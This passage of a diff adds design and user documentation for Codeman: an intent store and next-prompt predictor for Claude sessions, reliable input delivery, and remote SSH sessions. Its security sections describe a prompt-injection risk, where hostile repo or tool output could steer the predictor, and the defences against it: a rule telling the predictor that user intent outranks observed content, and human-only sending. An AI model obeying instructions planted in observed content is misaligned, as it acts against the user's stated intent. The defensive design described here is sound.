{ "suggestions": [ { "prompt": "...", "why": "...", "kind": "continue" | "verify" | "redirect" } ] }
|
||||
```
|
||||
|
||||
1-3 entries, and the *kinds* force useful diversity instead of three rewordings: `continue` (finish the current thread, or answer the pending dialog), `verify` (test/review what was just built; the user's own "always end-to-end test" discipline), `redirect` (the next goal from the intent profile that the current thread is not serving). The modal shows `continue` big, the others as alternates. Embedded newlines are stripped server-side (single-line prompt rule; multi-line breaks Ink).
|
||||
|
||||
## Predictor
|
||||
|
||||
New `src/readmymind-predictor.ts`, reusing the `AiCheckerBase` mechanics (prompt file to dodge E2BIG, one-shot `claude -p --output-format text` in a throwaway tmux `codeman-rmm-<id8>`, done-marker polling, timeout, model-name validation) but standalone: the base class is verdict-shaped (positive/negative/cooldown) and prediction is freeform JSON, so subclassing would abuse `reasoning` as a payload. If a shared spawn/poll helper falls out naturally, extract it; do not block on the refactor.
|
||||
|
||||
- **Model: opus** (decided). `readMyMindModel` setting, default `AI_CHECK_MODEL` (currently `claude-opus-4-5-20251101`); prediction quality is the product, and it runs only on an explicit press, so the cost profile is nothing like the idle checker's. Timeout 90s (opus headroom over a ~30 KB prompt).
|
||||
- Input: the assembled context above. The predictor itself stays dumb: text in, JSON out; all intelligence about *what to include* lives in the testable assembler.
|
||||
|
||||
## API (new `src/web/routes/readmymind-routes.ts`)
|
||||
|
||||
Normal authed API, `ApiResponse` envelope, Zod schemas in `schemas.ts`, ownership via `findSessionOrFail` (the profile key derives from the session's owner + workingDir, so multi-user scoping is structural):
|
||||
|
||||
- `GET /api/sessions/:id/intent` → the session's `IntentProfile`.
|
||||
- `PUT /api/sessions/:id/intent` body `{ goals }` (bounded) → update goals. Used by the modal's edit view and by the agent skill ("record that the user is working toward X").
|
||||
- `DELETE /api/sessions/:id/intent` → forget everything for this case (the modal's "Forget" affordance).
|
||||
- `POST /api/sessions/:id/readmymind` body `{ steer?, rejected? }` → `{ suggestions }`. 409 `INVALID_STATE` while a prediction is already running for the session; claude-mode sessions only (400 otherwise, mirroring wait-signal gating).
|
||||
|
||||
## Frontend
|
||||
|
||||
New module `readmymind-ui.js` (@loadorder 11.3, after panels-ui.js), prettier-formatted.
|
||||
|
||||
- **Desktop**: header button `btn-readmymind`, default-hidden via marker class `btn-readmymind--hidden` (the `!important` display rules require the marker-class pattern), shown by `applyHeaderVisibilitySettings()` when the setting is ON. Off phones per `test/mobile-header-buttons-policy.test.ts`.
|
||||
- **Phone**: a 🧠 key on the keyboard accessory bar (that bar is where input helpers live, and phones are where typing hurts most). Opens the same modal. Modal z-index respects the ≤768px layer rules (1300+).
|
||||
- **Send** goes server-side: `POST /api/sessions/:id/input` with `\r` appended. Deliberately NOT the browser keystroke path, so the `sendEnterKey` / local-echo-overlay trap never applies (the modal is UI chrome, not terminal typing). **Insert** is the same POST without `\r`.
|
||||
- i18n strings registered (en + zh-CN); suggestion text itself carries `data-i18n-skip`.
|
||||
|
||||
## Skill integration
|
||||
|
||||
The user-facing promise: the button is also a skill. Extend `skills/codeman`:
|
||||
|
||||
- New section "Read My Mind: intent + prediction" with the three intent verbs (read profile, append/replace goals, predict) and the guard notes (single-line prompts, never auto-send to another session without the user asking).
|
||||
- Update `reference/endpoints.md` (the endpoints.md drift test pins this).
|
||||
- The auto-injected case copy heals via the existing marker-owned `applyAgentSkill` mechanism; nothing new needed there.
|
||||
|
||||
Agent use cases this unlocks: a lead session records intentions as the user states them ("remember: shipping 1.16 is the goal"), and a returning user gets a prediction grounded in what the agent knew, not just raw prompt history.
|
||||
|
||||
## Security / privacy
|
||||
|
||||
- **The human gate is the injection mitigation**: pane output (attacker-influenceable) flows into the predictor, so its output is only ever *proposed*, rendered as text (`textContent`), and sent solely by an explicit user click. No auto-send path exists, including for the skill.
|
||||
- Intent data: 0600 file, bounded fields, per-owner keys, endpoints ownership-checked, excluded from search, cleared via DELETE.
|
||||
- Predictor spawns with the user's own credentials exactly like the AI idle/plan checkers; model name shell-validated the same way.
|
||||
- Setting OFF stops capture immediately; existing data stays until DELETE (explicit, not silent).
|
||||
|
||||
## Tests
|
||||
|
||||
- `test/intent-store.test.ts`: key derivation, caps/FIFO, consecutive-dupe skip, tag/tool_result filtering fixtures, 0600 mode, multi-user key separation.
|
||||
- `test/readmymind-context.test.ts`: fixture scenarios pinning the assembled prompt: pending-dialog-first ordering, tail-keeping truncation of the assistant turn, budget drop order (siblings before workspace signals), remote-case git skip, trust-tier framing present, rejected suggestions included only on rethink.
|
||||
- `test/readmymind-predictor.test.ts`: strict JSON parse, garbage output → error result, newline stripping, `kind` validation, rejected-suggestions threading into the prompt.
|
||||
- `test/routes/readmymind-routes.test.ts` (`app.inject`): CRUD round-trip, predict with a stubbed predictor, 409 while in flight, non-claude 400, ownership 404, Send/Insert byte assertions via the test-PTY echo (`\r` present vs absent).
|
||||
- Transcript capture: extend the transcript-watcher fixtures with user-turn entries.
|
||||
|
||||
## Phases
|
||||
|
||||
1. **Intent store + capture + intent endpoints + skill docs.** Immediately useful to agents even before any UI exists.
|
||||
2. **Context assembler + predictor + predict endpoint + desktop button/modal.** The feature as pitched. The assembler ships with all collectors it can serve from day one (transcript, intent, git, run-summary, siblings); the approvals collector activates when PR #245 lands.
|
||||
3. **Phone accessory key, rethink steering, alternates row.** Part 1 (shipped): the alternates row (tappable, swap into the field without losing edits; Rethink rejects the whole shown set), the phone 🧠 keyboard-accessory key (both bar templates, `rmm-enabled` marker class on the bar), and a phone-sized modal (small dialog, not full-screen). Part 2 (shipped): rethink steering, the free-text steer note under the suggestions, sent as `steer`, visible whenever Rethink is live (ready and empty-result phases), cleared on each open; the empty-result copy points at the note, and the footer buttons moved to the styled `btn-toolbar` convention (the bare `btn btn-*` classes they shipped with match no CSS in this codebase and rendered as unstyled UA buttons).
|
||||
4. Explicitly later: proactive predict-on-idle (ghost suggestion chip), auto-compaction of `recentPrompts` into `goals` via a cheap model, codex/gemini capture, cross-case "global" intent.
|
||||
|
||||
## Open questions
|
||||
|
||||
- Should Rethink's rejected-suggestion memory persist across modal closes, or reset each open?
|
||||
- Is a composer-adjacent placement (next to the toolbar Run controls) better than the header for discoverability?
|
||||
- Pending-dialog input (source #1) consumes the approvals-inbox store (PR #245, merged): the phase-2 collector reads pending items directly from `src/approval-inbox.ts`.
|
||||
|
||||
## Docs
|
||||
|
||||
- CLAUDE.md: Key Patterns entry, State Files (`intents.json`), frontend load order, route count.
|
||||
- `docs/api-reference.md`: four endpoints (additive under the 0.9.x contract).
|
||||
- `skills/codeman/reference/endpoints.md`: new rows (drift-test enforced).
|
||||
@@ -0,0 +1,108 @@
|
||||
# Read My Mind
|
||||
|
||||
Codeman's per-case memory of what you are trying to accomplish, and the 🧠 button that turns it into a predicted next prompt. Each case gets an **intent profile**: a freeform `goals` text (written by you or your agent) plus the prompts you actually submitted, captured automatically while the feature is on. Pressing 🧠 feeds that profile and the live session signals to a one-shot model call and shows the predicted prompt for you to send, edit, or rethink. Nothing is ever sent to a session automatically. Design doc: [`readmymind-plan.md`](readmymind-plan.md).
|
||||
|
||||
## What it does
|
||||
|
||||
- Captures the prompts you submit in Claude sessions into a per-case history (50 most recent, bounded).
|
||||
- Lets you (or your agent) record explicit goals per case.
|
||||
- Predicts your next prompt on demand (the 🧠 header button, or `POST .../readmymind` for agents): the suggestion arrives in a modal with Send / Insert / Rethink / Dismiss.
|
||||
- Exposes the profile over the HTTP API, and to agents through the `codeman` skill, so an agent can ground its work in what you actually want instead of guessing from the last screenful.
|
||||
|
||||
## Turning it on
|
||||
|
||||
App Settings → Header & Panels → Cross-session features → **Read My Mind** (synced setting `readMyMindEnabled`, default **OFF**). It gates everything: capture, the header button, and nothing shows anywhere while it is off. The API equivalent:
|
||||
|
||||
```bash
|
||||
curl -sk -X PUT https://localhost:3000/api/settings \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"readMyMindEnabled": true}'
|
||||
```
|
||||
|
||||
Add `-u user:password` if your install has `CODEMAN_PASSWORD` set, and drop `-k`/use `http://` for a plain-HTTP dev server. Turning it OFF stops capture immediately; existing profiles stay until you delete them (below).
|
||||
|
||||
## The 🧠 button
|
||||
|
||||
On a Claude session, press the brain button in the header (desktop) or the 🧠 key on the keyboard accessory bar (phones and tablets; it appears when the setting is on). Codeman assembles everything it already knows: your goals, your recent prompts (with your voice: length, tone, shorthand), the tail of the last assistant reply, recent tool activity, git state (branch, dirty files, pending changesets), how long you have been away and what happened meanwhile, sibling sessions in the same case, and any dialog the session is currently waiting on. A one-shot model call (opus by default, `readMyMindModel` to override) turns that into 1-3 suggestions; the top one lands in an editable field with its rationale, and the others render as tappable alternate rows: tap one to swap it into the field (edits you already made are kept on the row you leave).
|
||||
|
||||
- **Send** submits it to the session (with Enter).
|
||||
- **Insert** drops it on the CLI composer *without* Enter, so you can edit it in the terminal before sending.
|
||||
- **Rethink** re-runs with everything shown (the field and the alternates) recorded as rejected. An optional steer note below the suggestions ("no, I meant the mobile bug") rides along as your own words, the highest-authority signal the predictor gets; it stays in the field across re-runs until you clear it or reopen the modal.
|
||||
- **Dismiss** closes; nothing happens.
|
||||
|
||||
A prediction takes 5-90 seconds and costs real tokens; one runs per session at a time. If the session is sitting on a permission/question dialog, the suggestion is usually an answer to that dialog: that is intentional.
|
||||
|
||||
**Security note**: the prediction reads observable content (assistant output, tool logs, git output) which a hostile repo could try to steer. The predictor is told user-stated intent outranks anything observed, and, more importantly, a suggestion is only ever *proposed*: your click is the boundary. No auto-send path exists, including for agents.
|
||||
|
||||
## What gets captured, exactly
|
||||
|
||||
Capture reads the Claude session transcript, not your keystrokes: when a user turn lands in the transcript, its text is folded into the case's profile. Filters applied on the way in:
|
||||
|
||||
- **Claude-mode sessions only.** Shell, OpenCode, Codex, Gemini, and Antigravity sessions are never captured (they have no transcript watcher).
|
||||
- Tool results, local slash-command echo (`/model` and friends), system wrappers, and interrupt markers are skipped.
|
||||
- Entries shorter than 3 characters are skipped (menu digits, Esc artifacts).
|
||||
- Consecutive duplicates collapse (auto-resume's "continue" spam counts once per run).
|
||||
- Each prompt is stored as one line, truncated to 500 characters; the history caps at 50 prompts FIFO.
|
||||
|
||||
Because the transcript path arrives via Claude Code hooks, capture needs hooks to reach the server, the same condition as hook-based idle detection. Docker cases against a loopback-only server need `CODEMAN_DOCKER_BRIDGE_HOOKS=1`; remote-SSH cases do not capture.
|
||||
|
||||
## What is never captured
|
||||
|
||||
- Anything while `readMyMindEnabled` is OFF (capture is not retroactive).
|
||||
- Terminal output, keystrokes, passwords typed into shells: only submitted Claude prompts are read.
|
||||
- Nothing leaves the machine beyond the model call you explicitly trigger, and profiles are never fed into `/api/search`.
|
||||
|
||||
## Where it lives, and how to wipe it
|
||||
|
||||
Profiles live in `~/.codeman/intents.json`, written atomically at mode 0600 (captured prompts can contain secrets). The file is per Codeman instance. Keys derive from owner + the case's resolved working directory, so profiles survive `/clear`, respawn cycles, and session churn, and in multi-user mode two owners of the same directory get separate profiles.
|
||||
|
||||
Forget one case: `DELETE /api/sessions/:id/intent` (below). Forget everything: stop the server and delete `~/.codeman/intents.json`.
|
||||
|
||||
## The API
|
||||
|
||||
Four endpoints, session-scoped so ownership is enforced by the session itself (`/api/v1/` aliases work too; full spec in [`api-reference.md`](api-reference.md)):
|
||||
|
||||
```bash
|
||||
# Read the profile for a session's case
|
||||
curl -sk https://localhost:3000/api/sessions/$SID/intent | jq '.data.intent'
|
||||
|
||||
# Record goals (REPLACES the text: read + merge if you want to append)
|
||||
curl -sk -X PUT https://localhost:3000/api/sessions/$SID/intent \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"goals":"ship 1.17; then mobile polish"}'
|
||||
|
||||
# Forget the case
|
||||
curl -sk -X DELETE https://localhost:3000/api/sessions/$SID/intent
|
||||
|
||||
# Predict the next prompt (claude-mode only; takes 5-90 s)
|
||||
curl -sk -X POST https://localhost:3000/api/sessions/$SID/readmymind \
|
||||
-H 'Content-Type: application/json' -d '{}' | jq '.data.suggestions'
|
||||
```
|
||||
|
||||
A case with nothing recorded answers an empty profile with `updatedAt: 0`; reads never persist anything. Goals cap at 8192 characters and the schema is strict, so unknown fields or over-long goals answer `400 INVALID_INPUT`. A session you do not own answers `404 NOT_FOUND`, indistinguishable from a nonexistent one. Predict answers `{ suggestions: [{ prompt, why, kind }], durationMs }` (`kind`: `continue` / `verify` / `redirect`), `409 CONFLICT` while one is already running, `400 INVALID_INPUT` on non-claude sessions, and `502 OPERATION_FAILED` when the model produced no usable JSON. The rethink flow passes `{"steer":"…","rejected":["…"]}`.
|
||||
|
||||
## For agents (the skill)
|
||||
|
||||
The `codeman` agent skill documents the same verbs (SKILL.md §3 plus `reference/endpoints.md`), with the ground rules: read the profile to understand what the user wants, record goals the user actually stated, merge instead of blind-writing (PUT replaces), never delete a profile unprompted, and never send a predicted suggestion into a session unless the user asked. It is the user's memory, not the agent's.
|
||||
|
||||
## What comes next
|
||||
|
||||
Explicitly later: proactive predict-on-idle, auto-compaction of the prompt history into goals, non-Claude capture. See the phases section of [`readmymind-plan.md`](readmymind-plan.md).
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Symptom | Cause / fix |
|
||||
| ------- | ----------- |
|
||||
| No 🧠 button in the header | `readMyMindEnabled` is OFF (App Settings → Header & Panels → Cross-session features), you are on a phone (there it is a key on the keyboard accessory bar instead, visible while typing), or the active session is not claude-mode |
|
||||
| Prediction feels generic | The profile is thin: record goals (PUT or ask your agent to), and let capture accumulate a few real prompts first |
|
||||
| "A prediction is already running" (409) | One per session at a time; wait for the current one (up to 90 s) |
|
||||
| Prediction fails (502) | The model returned no usable JSON, or the CLI could not start; retry. Check `readMyMindModel` if you overrode it |
|
||||
| Profile stays empty although I am prompting | `readMyMindEnabled` was OFF at the time (capture is not retroactive), the session is not claude-mode, or hooks are not reaching the server (Docker case on a loopback bind without `CODEMAN_DOCKER_BRIDGE_HOOKS=1`, or a remote-SSH case) |
|
||||
| Short answers I typed are missing | Entries under 3 characters are filtered by design (menu digits, Esc artifacts) |
|
||||
| My goals text vanished after an agent wrote to it | PUT replaces the whole text; the skill tells agents to read + merge, but a blind write wins. Re-state the goals; consider phrasing them in the session so capture keeps the evidence |
|
||||
| Two profiles for what I think is one case | Different owners in multi-user mode, or genuinely different directories; paths are realpath-resolved, so symlink spellings converge but distinct checkouts do not |
|
||||
| `400 INVALID_INPUT` on PUT | Goals over 8192 chars, or an extra field in the body (strict schema) |
|
||||
|
||||
## Where the code lives
|
||||
|
||||
`src/intent-store.ts` (store + pure helpers, singleton), the `transcript:user_prompt` event in `src/transcript-watcher.ts`, capture wiring in `src/web/server.ts` (`captureIntentPrompt`), context assembly in `src/readmymind-context.ts` (pure) + `src/readmymind-collectors.ts` (transcript tail + git IO), the predictor in `src/readmymind-predictor.ts`, routes in `src/web/routes/readmymind-routes.ts`, schemas in `src/web/schemas.ts`, frontend in `src/web/public/readmymind-ui.js`. Tests: `test/intent-store.test.ts`, `test/readmymind-context.test.ts`, `test/readmymind-collectors.test.ts`, `test/readmymind-predictor.test.ts`, `test/routes/readmymind-routes.test.ts`, and the capture cases in `test/transcript-watcher.test.ts`.
|
||||
@@ -0,0 +1,72 @@
|
||||
# Reliable input delivery (exactly-once, durable)
|
||||
|
||||
## The bug this fixes
|
||||
|
||||
With local echo on, pressing Enter cleared the overlay and then sent the prompt
|
||||
over the WebSocket **fire-and-forget** (`ws.send({t:'i',d})`). On a flaky link
|
||||
(e.g. a moving train) the socket is frequently *half-open*: `readyState === OPEN`
|
||||
so `ws.send()` does **not** throw, but the underlying TCP is dead, so the frame is
|
||||
silently discarded. Nothing was enqueued (the send "succeeded"), the on-screen
|
||||
prompt was already wiped, and `navigator.onLine` stays `true` — so a long typed
|
||||
prompt vanished with no trace and no resend.
|
||||
|
||||
## The guarantee
|
||||
|
||||
Every byte of user input is **recorded durably before delivery** and **only
|
||||
dropped once the server ACKs it** — so a half-open socket, a reconnect, or a page
|
||||
reload can never lose input. Redelivery is **exactly-once**: the server applies
|
||||
each `(clientId, seq)` at most once, so a resend can't type the prompt twice.
|
||||
|
||||
## How it works
|
||||
|
||||
### Client (`app.js`)
|
||||
|
||||
- A stable **`clientId`** (`localStorage['codeman:clientId']`) identifies this
|
||||
browser to the server's dedup across reconnects and reloads.
|
||||
- Each input frame gets a **monotonic per-session `seq`**. Frame records
|
||||
(`{seq,data,useMux,ts,tries,sentAt}`) live in `_pendingDeliveries`
|
||||
(`Map<sessionId, record[]>`), persisted (debounced, + flushed on `pagehide`/
|
||||
`visibilitychange`) to `localStorage['codeman:pendingInput']`. The seq counters
|
||||
persist too, so seqs stay monotonic across reloads (never reset — a reset would
|
||||
let the server treat fresh input as an already-applied duplicate).
|
||||
- **Delivery** (`_drainSession`):
|
||||
- **WS path** — when the socket is `OPEN` for the session, send each not-yet-sent
|
||||
record (`sentAt === 0`) in seq order over the single ordered stream. Records
|
||||
stay pending until the server's `{t:'ia',seq}` ACK removes them.
|
||||
- **POST path** — when no WS, POST records in order, awaiting each (the HTTP 2xx
|
||||
*is* the ACK). A 404/410 (session gone) drops the record rather than retry
|
||||
forever.
|
||||
- **Half-open recovery** (`_redeliverSweep`, every 2s): if the active WS session's
|
||||
oldest record is unacked past `_reliableAckTimeoutMs` (4s), the socket is assumed
|
||||
dead — `ws.close()` forces a fast reconnect; `onopen` (`_onWsReady`) resets
|
||||
`sentAt = 0` and re-sends everything pending. Also re-drains background sessions
|
||||
over POST, and fires on SSE-reconnect / `online`.
|
||||
- The connection indicator shows pending count/bytes (`_pendingBytes`).
|
||||
|
||||
### Server
|
||||
|
||||
- **`Session.shouldApplyInput(clientId, seq)`** — returns `true` exactly once per
|
||||
`(clientId, seq)`: the first time a seq strictly greater than that client's
|
||||
last-applied is seen. A replayed/lower seq returns `false`. Bounded MRU map
|
||||
(`MAX_INPUT_DEDUP_CLIENTS = 256`).
|
||||
- **WS route** (`ws-routes.ts`) — parses optional `cid`/`seq` on `{t:'i'}`; applies
|
||||
via `shouldApplyInput` (skips a duplicate, still ACKs with `{t:'ia',seq}` so the
|
||||
client drops it). Untagged frames apply unconditionally (no behavior change).
|
||||
- **POST route** (`/api/sessions/:id/input`) — optional `seq`/`clientId` in
|
||||
`SessionInputWithLimitSchema`; a deduped duplicate returns 200 without writing
|
||||
(the 200 is the client's ACK). `curl`/legacy callers omit the fields and always
|
||||
apply.
|
||||
|
||||
## Known limitation
|
||||
|
||||
Dedup state is in-memory on the server. A **server restart** between a write and
|
||||
the client's redelivery of that same seq could re-apply it (a rare duplicate).
|
||||
This is a deliberate trade-off: favor *never losing input* over a rare duplicate
|
||||
across the narrow restart window.
|
||||
|
||||
## Tests
|
||||
|
||||
- `test/reliable-input-dedup.test.ts` — `Session.shouldApplyInput` exactly-once
|
||||
semantics (monotonic, per-client, gap-tolerant, eviction-safe).
|
||||
- `test/routes/session-routes.test.ts` — POST `/input` applies a tagged
|
||||
`(clientId, seq)` once on redelivery; untagged input always applies.
|
||||
@@ -0,0 +1,246 @@
|
||||
# Remote Sessions (SSH)
|
||||
|
||||
Codeman can run a session's agent on a **remote host over SSH** instead of the
|
||||
local machine. The agent (Claude, OpenCode, Codex, Antigravity, Gemini, or a plain shell)
|
||||
runs inside a `tmux` server **on the remote host**, so it survives the SSH
|
||||
connection dropping; Codeman attaches to it the same way it attaches to a local
|
||||
managed session.
|
||||
|
||||
This document covers the data model, the shell-safe SSH command construction
|
||||
(COD-107), the durable-launch design (COD-104), and the operational caveats.
|
||||
For the local session/mux machinery this builds on, see the **Mux** and
|
||||
**Session** entries in `CLAUDE.md` → Architecture.
|
||||
|
||||
## Why it exists
|
||||
|
||||
A developer box (`AA-DESKTOP`) often needs to drive an agent on another machine —
|
||||
a NAS, a build server, a host reachable only through a jump box or a
|
||||
cloudflared SOCKS5 proxy. Rather than wrap `ssh` by hand per host, Codeman
|
||||
stores reusable **remote hosts** + **remote cases** and reproduces the exact
|
||||
connection the operator already uses (`ssh-aa-desktop`-style configs:
|
||||
custom port, identity file, `-J` jump host, `-o ProxyCommand`).
|
||||
|
||||
## Data model
|
||||
|
||||
Types live in `src/types/session.ts`; persistence in `src/remote-hosts.ts`.
|
||||
|
||||
| Type | Role |
|
||||
|------|------|
|
||||
| `RemoteSshOptions` | The **HOW-to-reach** fields, shared by host + session: `identityFile`, `socksProxy` (`host:port`), `jumpHost` (`[user@]host[:port]`), `extraSshOptions` (`KEY=VALUE[]`). Every field optional — all-absent reproduces port-22, default-identity, directly-SSH-able behavior. |
|
||||
| `RemoteHost` (extends `RemoteSshOptions`) | A saved host: `id`, `label`, `host`, `username`, `port?`, `commands?` (per-mode launch command override). |
|
||||
| `RemoteCase` | A working directory on a host: `name`, `type: 'remote'`, `hostId`, `remotePath`. |
|
||||
| `SessionRemote` (extends `RemoteSshOptions`) | The resolved bundle stamped onto a live session: host coordinates + `remotePath` + `commands`, plus **`owned?`** and **`remoteSessionName?`** (COD-105 — see [Ownership](#ownership-launched-vs-discovered-and-attached-cod-105)). Built by `toSessionRemote(host, case)` (sets `owned: true`) for the launch path, or `toAttachedSessionRemote(host, name, path)` (sets `owned: false`) for the attach path. Both copy the advanced SSH options through so every connection is identical. |
|
||||
| `RemoteCommandMode` | `Extract<SessionMode, 'shell' \| 'claude' \| 'opencode' \| 'codex' \| 'gemini' \| 'antigravity'>` — the modes that can run remotely. |
|
||||
| `RemoteSessionInfo` (COD-105) | One discovered remote tmux session: `name` (always `codeman-*`), `attached` (a client is connected), `created` (epoch s), `windows`. Returned by `listRemoteCodemanSessions()`. |
|
||||
|
||||
Persistence is two flat JSON arrays in the instance data dir:
|
||||
|
||||
- `~/.codeman/remote-hosts.json` — `readRemoteHosts()` / `writeRemoteHosts()`
|
||||
- `~/.codeman/remote-cases.json` — `readRemoteCases()` / `writeRemoteCases()`
|
||||
|
||||
(Paths via `remoteHostsPath()` / `remoteCasesPath()`; both honor `CODEMAN_INSTANCE`
|
||||
because the config dir is the instance data dir.)
|
||||
|
||||
On the live `Session`, the remote rides as `_remote?: SessionRemote`. When
|
||||
attaching, `resolveMuxAttachCwd()` forces the cwd to `/tmp` for remote sessions —
|
||||
the local working directory is meaningless on the remote box.
|
||||
|
||||
## SSH command construction (COD-107 — the injection surface)
|
||||
|
||||
**All** SSH command lines flow through one function so user-controlled fields are
|
||||
escaped once and the launch + prereq probe can never drift apart:
|
||||
|
||||
```ts
|
||||
// src/remote-hosts.ts
|
||||
buildSshConnectionArgs(remote: RemoteSshOptions & Pick<RemoteHost, 'port'>): string[]
|
||||
```
|
||||
|
||||
It returns the **ordered leading tokens** of an ssh command line (no `-t`, no
|
||||
target, no remote command):
|
||||
|
||||
```
|
||||
ssh -o BatchMode=yes
|
||||
[-p <port>]
|
||||
[-i <abs-identity>] # ~ / $HOME expanded, then shellescaped
|
||||
[-J <jumpHost>] # shellescaped, single token
|
||||
[-o ProxyCommand=nc -X 5 -x <socks> %h %p] # ONE shellescaped -o token
|
||||
[-o <KEY=VALUE>] … # each extra option, shellescaped
|
||||
```
|
||||
|
||||
Rules that keep this safe — **do not bypass them by hand-building an ssh line elsewhere:**
|
||||
|
||||
- **Every** user-controlled value (`-i`, `-J`, `-o`, ProxyCommand) is POSIX
|
||||
single-quote `shellescape`d (`'…'` with embedded `'\''`). The helper mirrors
|
||||
the one in `tmux-manager.ts`.
|
||||
- **`~`/`$HOME` in `identityFile` is expanded at build time** (`expandIdentityPath`),
|
||||
*before* escaping — ssh does not expand `~` inside `-i`, and the escaped value
|
||||
never reaches a shell that would.
|
||||
- **The ProxyCommand is one shellescaped `-o KEY=VALUE` token**, so its spaces and
|
||||
the `%h`/`%p` placeholders reach ssh as a single argument. `%h %p` survive
|
||||
verbatim — **ssh** expands them to the real host/port, not the shell.
|
||||
- **Empty options ⇒ `['ssh', '-o BatchMode=yes']`** (+ `-p` only when set) —
|
||||
byte-identical to the historical behavior.
|
||||
|
||||
Token construction is unit-tested independently of any live connection (see
|
||||
`test/` for `buildSshConnectionArgs` / `buildRemoteTmuxCheckCommand` cases).
|
||||
|
||||
## Durable launch (COD-104)
|
||||
|
||||
`buildRemoteLaunchCommand({ mode, remote, sessionId })` in `tmux-manager.ts`
|
||||
builds the command that launches (or **reattaches** to) the remote session:
|
||||
|
||||
```
|
||||
ssh -o BatchMode=yes -t <connection-args> user@host \
|
||||
'tmux -L codeman-remote new-session -A -s codeman-ssh-<id8> -c <remotePath> "cd <remotePath> && exec <cli>" \; \
|
||||
set -t codeman-ssh-<id8> status off \; set -t codeman-ssh-<id8> mouse off \; \
|
||||
set -t codeman-ssh-<id8> prefix C-q \; set -s escape-time 0 \; \
|
||||
set -t codeman-ssh-<id8> window-size latest'
|
||||
```
|
||||
|
||||
Key points:
|
||||
|
||||
- **`new-session -A -s codeman-ssh-<id8>`** = attach-if-exists-else-create, so a
|
||||
reconnect (same deterministic `remoteTmuxSessionName(sessionId)` — `codeman-ssh-` +
|
||||
the first 8 chars of the session id) lands back in
|
||||
the **same** remote session rather than spawning a duplicate. This is what makes
|
||||
the remote agent survive an SSH drop. The name deliberately fails
|
||||
`SAFE_MUX_NAME_PATTERN` so a Codeman running ON the remote host never adopts it.
|
||||
- **`-L codeman-remote`** = a DEDICATED socket for sessions launched by remote
|
||||
Codemans, NOT the canonical `-L codeman` socket the remote host's own Codeman
|
||||
uses. Options are set per-session (`set -t`), never `-g`, so a shared remote
|
||||
tmux server's other sessions are untouched (#145 hardening). Note the
|
||||
asymmetry: **discovery/attach (COD-105) target the canonical `-L codeman`
|
||||
socket** — they join sessions the remote's own Codeman manages, while owned
|
||||
durable launches live on `-L codeman-remote`.
|
||||
- **`exec <cli>`** replaces the pane shell with the agent, so the pane PID *is*
|
||||
the agent. The per-mode command comes from `remote.commands?.[mode]` or
|
||||
`defaultRemoteCommandForMode(mode)` (`exec claude` / `exec opencode` /
|
||||
`exec codex` / `exec gemini` / `exec agy` / `exec bash -l`).
|
||||
- The **whole tmux invocation is a single shell-quoted ssh argument**, and the
|
||||
pane command is independently quoted, so a `remotePath` with spaces is safe.
|
||||
- Connection options come from the **same `buildSshConnectionArgs(remote)`** as
|
||||
the prereq probe; `-t` is inserted right after `ssh -o BatchMode=yes`,
|
||||
preserving historical token order.
|
||||
|
||||
### tmux prerequisite probe
|
||||
|
||||
Because durable remote sessions require tmux on the remote host,
|
||||
`checkRemoteTmuxAvailable(host)` runs `command -v tmux` over SSH **before**
|
||||
creating a remote case/session and returns a structured, never-throwing result:
|
||||
|
||||
- empty stdout / non-zero exit → *"remote host `<host>` needs tmux installed for
|
||||
durable remote sessions"*
|
||||
- stderr present → *"could not verify tmux on remote host `<host>`: `<stderr>`"*
|
||||
(a real connection failure, surfaced to the operator)
|
||||
- success → `{ ok: true, tmuxPath }`
|
||||
|
||||
It connects with the **identical** options as the launch
|
||||
(`buildRemoteTmuxCheckCommand` reuses `buildSshConnectionArgs` and inserts
|
||||
`-o ConnectTimeout=10`), so a proxied/custom-port/identity host that the launch
|
||||
can reach also passes the probe (and vice-versa).
|
||||
|
||||
**Test-mode short-circuit:** under `VITEST` the probe returns
|
||||
`{ ok: true, tmuxPath: '(test-mode)' }` without opening a socket — mirroring
|
||||
`TmuxManager`'s no-op-shell-under-VITEST (`IS_TEST_MODE`). Without it, remote-case
|
||||
create-path tests would hit a real ~10s ssh timeout. Only the live probe is
|
||||
skipped; command construction is still asserted by unit tests.
|
||||
|
||||
## Ownership: launched vs. discovered-and-attached (COD-105)
|
||||
|
||||
COD-104 (above) was Phase 1 — Codeman *launches* a remote session and owns it.
|
||||
COD-105 is Phase 2 — Codeman can also **discover** `codeman-*` tmux sessions
|
||||
already running on a remote host (created by the remote's own Codeman or another
|
||||
instance) and **attach** to one it didn't launch. Ownership decides what happens
|
||||
when the tab closes.
|
||||
|
||||
`SessionRemote.owned` carries this:
|
||||
|
||||
- **`owned: true`** (or absent — legacy/COD-104 sessions persisted before this
|
||||
field) — we launched it via `buildRemoteLaunchCommand` and may explicitly kill it.
|
||||
- **`owned: false`** — discovered + attached; another Codeman owns the remote
|
||||
session. `remoteSessionName` holds its existing tmux name. Closing the tab
|
||||
**detaches**, never kills.
|
||||
|
||||
### Discovery
|
||||
|
||||
`listRemoteCodemanSessions(host)` lists the remote's `codeman-*` sessions:
|
||||
|
||||
- `buildRemoteListSessionsCommand()` runs `tmux -L codeman list-sessions -F "…"`
|
||||
over SSH (connection args from the shared `buildSshConnectionArgs`, so discovery
|
||||
connects identically to launch/probe). `2>/dev/null` swallows tmux's "no server
|
||||
running" stderr.
|
||||
- `parseRemoteSessionList()` is a **pure, unit-tested** parser. ⚠️ Quirk: the
|
||||
remote tmux's `-F "…\t…"` format emits the **literal two-character `\t`**, not a
|
||||
real tab (verified on tmux next-3.7), so the parser splits on `/\\t|\t/` (literal
|
||||
backslash-t **or** a real tab, for builds that do expand it). It keeps only
|
||||
`codeman-*` names, coerces types, and skips malformed lines.
|
||||
- `listRemoteCodemanSessions()` **never throws** — unreachable host / no tmux / no
|
||||
sessions all map to `[]`. Like the prereq probe, it **no-ops to `[]` under
|
||||
`VITEST`** so a request path never opens a real ssh connection.
|
||||
|
||||
Discovery is **explicit** — the UI has a "Discover existing sessions" button per
|
||||
host; Codeman never auto-discovers on host select.
|
||||
|
||||
### Attach vs. launch selection
|
||||
|
||||
`buildRemoteSessionCommand(mode, remote, sessionId)` in `tmux-manager.ts` picks the
|
||||
remote command line by ownership:
|
||||
|
||||
- **`owned === false`** → `buildRemoteAttachCommand(remote, name)` — emits
|
||||
`ssh … -t … 'tmux -L codeman attach -t <remoteSessionName>'`. It uses **`attach`,
|
||||
NOT `new-session -A`**, so it only *joins* an existing session and never creates
|
||||
one.
|
||||
